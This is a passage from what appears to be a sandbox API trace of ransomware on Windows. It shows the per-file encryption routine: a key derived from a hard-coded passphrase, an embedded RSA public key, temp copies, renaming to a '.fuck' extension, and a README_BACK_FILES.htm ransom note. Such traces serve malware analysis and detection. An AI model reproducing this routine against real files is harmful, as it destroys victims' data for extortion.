lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\UserData\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27eba20 [0235.769] FindNextFileA (in: hFindFile=0x27eba20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.770] FindNextFileA (in: hFindFile=0x27eba20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0235.770] FindClose (in: hFindFile=0x27eba20 | out: hFindFile=0x27eba20) returned 1 [0235.770] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\UserData\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\userdata\\readme_back_files.htm")) returned 0xffffffff [0235.770] AreFileApisANSI () returned 1 [0235.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6b08, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0235.770] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\UserData\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\userdata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.770] GetLastError () returned 0x5 [0235.770] GetLastError () returned 0x5 [0235.770] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0235.770] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27ebc20 [0235.777] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.782] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.782] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.782] GetLastError () returned 0x5 [0235.782] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man")) returned 0x20 [0235.783] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man", dwFileAttributes=0x80) returned 0 [0235.783] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.784] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.784] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man.gsg", dwFileAttributes=0x2) returned 0 [0235.784] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27e8ee8) returned 1 [0235.794] CryptCreateHash (in: hProv=0x27e8ee8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0235.794] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.794] CryptHashData (hHash=0x27ebce0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.794] CryptDeriveKey (in: hProv=0x27e8ee8, Algid=0x6610, hBaseData=0x27ebce0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebd60) returned 1 [0235.794] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.794] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0235.794] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27e92a0) returned 1 [0235.797] CryptImportPublicKeyInfo (in: hCryptProv=0x27e92a0, dwCertEncodingType=0x1, pInfo=0x27f78b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f78e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f78f0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27ebe60) returned 1 [0235.797] CryptEncrypt (in: hKey=0x27ebe60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0235.797] CryptEncrypt (in: hKey=0x27ebe60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e9988*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27e9988*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0235.797] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e9988, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.797] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0235.797] CryptEncrypt (in: hKey=0x27ebd60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0235.797] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.797] CloseHandle (hObject=0xffffffff) returned 1 [0235.797] CloseHandle (hObject=0xffffffff) returned 1 [0235.797] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man"), bFailIfExists=0) returned 0 [0235.798] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man", dwFileAttributes=0x0) returned 0 [0235.798] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man.gsg")) returned 0 [0235.798] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man.fuck")) returned 0 [0235.799] CryptDestroyHash (hHash=0x27ebce0) returned 1 [0235.799] CryptDestroyKey (hKey=0x27ebd60) returned 1 [0235.799] CryptReleaseContext (hProv=0x27e8ee8, dwFlags=0x0) returned 1 [0235.799] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.799] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.799] GetLastError () returned 0x5 [0235.799] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml")) returned 0x20 [0235.800] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0235.800] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.800] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.801] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.801] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27e93b0) returned 1 [0235.811] CryptCreateHash (in: hProv=0x27e93b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0235.811] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.811] CryptHashData (hHash=0x27ebce0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.811] CryptDeriveKey (in: hProv=0x27e93b0, Algid=0x6610, hBaseData=0x27ebce0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27eb8a0) returned 1 [0235.811] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.811] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0235.811] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27e9d40) returned 1 [0235.814] CryptImportPublicKeyInfo (in: hCryptProv=0x27e9d40, dwCertEncodingType=0x1, pInfo=0x27f6d58*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6d88*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6d90*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eba20) returned 1 [0235.814] CryptEncrypt (in: hKey=0x27eba20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0235.814] CryptEncrypt (in: hKey=0x27eba20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e9b20*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27e9b20*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0235.814] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e9b20, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.815] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0235.815] CryptEncrypt (in: hKey=0x27eb8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0235.815] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.815] CloseHandle (hObject=0xffffffff) returned 1 [0235.815] CloseHandle (hObject=0xffffffff) returned 1 [0235.815] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0235.815] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0235.816] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml.gsg")) returned 0 [0235.816] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml.fuck")) returned 0 [0235.816] CryptDestroyHash (hHash=0x27ebce0) returned 1 [0235.816] CryptDestroyKey (hKey=0x27eb8a0) returned 1 [0235.816] CryptReleaseContext (hProv=0x27e93b0, dwFlags=0x0) returned 1 [0235.816] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.816] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.816] GetLastError () returned 0x5 [0235.816] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml")) returned 0x20 [0235.817] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0235.818] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.818] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.818] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.818] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27e94c0) returned 1 [0235.828] CryptCreateHash (in: hProv=0x27e94c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0235.828] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.828] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.828] CryptDeriveKey (in: hProv=0x27e94c0, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebc60) returned 1 [0235.828] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.828] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0235.828] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27e9e50) returned 1 [0235.831] CryptImportPublicKeyInfo (in: hCryptProv=0x27e9e50, dwCertEncodingType=0x1, pInfo=0x27f7648*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7678*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7680*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27ebd60) returned 1 [0235.831] CryptEncrypt (in: hKey=0x27ebd60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0235.831] CryptEncrypt (in: hKey=0x27ebd60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e9ba8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27e9ba8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0235.831] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e9ba8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.831] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0235.831] CryptEncrypt (in: hKey=0x27ebc60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0235.831] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.832] CloseHandle (hObject=0xffffffff) returned 1 [0235.832] CloseHandle (hObject=0xffffffff) returned 1 [0235.832] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0235.832] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0235.832] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml.gsg")) returned 0 [0235.833] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml.fuck")) returned 0 [0235.833] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0235.833] CryptDestroyKey (hKey=0x27ebc60) returned 1 [0235.833] CryptReleaseContext (hProv=0x27e94c0, dwFlags=0x0) returned 1 [0235.833] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.833] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.833] GetLastError () returned 0x5 [0235.833] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml")) returned 